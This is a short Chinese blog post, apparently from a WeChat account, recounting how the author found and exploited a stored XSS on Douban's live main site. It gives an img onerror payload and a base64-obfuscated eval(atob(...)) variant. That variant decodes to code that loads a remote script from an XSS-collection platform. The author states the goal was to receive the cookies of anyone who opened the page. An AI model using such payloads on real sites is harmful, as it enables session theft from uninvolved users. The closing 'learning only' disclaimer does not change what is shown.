作者;南方有梦
圈子内的小大佬,叮咚信安核心成员,目前正在面壁思过中
0x00 缘起
2/19晚上十点左右,我在这一天”忙碌”的网课生活中解放出来。因为傍晚挖到联想的漏洞,想着既然它们在漏洞盒子有项目那么应该有自己的应急响应平台吧。
然后我尝试百度:联想应急响应
我一个个的打开,当我打开豆瓣的网站时。怦然心动;是这样的
以我的惊天地泣鬼神的反应力,直接梭哈提交漏洞盒子。
0x01 XSS因
我开始挖掘这个xss是如何产生的,一个快捷键:Ctrl + U打开了前端源代码查看
因为xss的弹窗无非就是alert(),confirm()和prompt()
我就本着习惯先去查看了alert
很快就找到了罪魁语句:
<img src="x" onerror="alert('hello')">然后我回到前端,查看是哪个用户插入的语句
开启我的F12,装逼功能(当然不是修改页面哈)
找到了真正的大佬
0x02 XSS果
我也满足一下自己的b格,给自己弹了一个b话十足的句子
于是呢,我就想着去xsspt创建项目,这样有人打开我就能梭哈一波了。
<img src=" https://xsspt.com/****** " onerror="alert('我是帅哥南方')">
当我插入的时候重新访问网站时候,平台并没有接收到我的cookie
我就想着是不是过滤了,于是呢
<img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwczovL3hzc3B0LmNvbS93UU5qUE4/JytNYXRoLnJhbmRvbSgp'))>
我们可以对自己的payload做些手脚
然后插入,刷新。
说明:
文章仅用于思路方法学习,请勿用于非法用途
全世界只有不到3 % 的人关注了渗透云笔记
你真是个特别的人
本文始发于微信公众号(谢公子学安全):我在机缘巧合下发现豆瓣主站存储型XSS
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论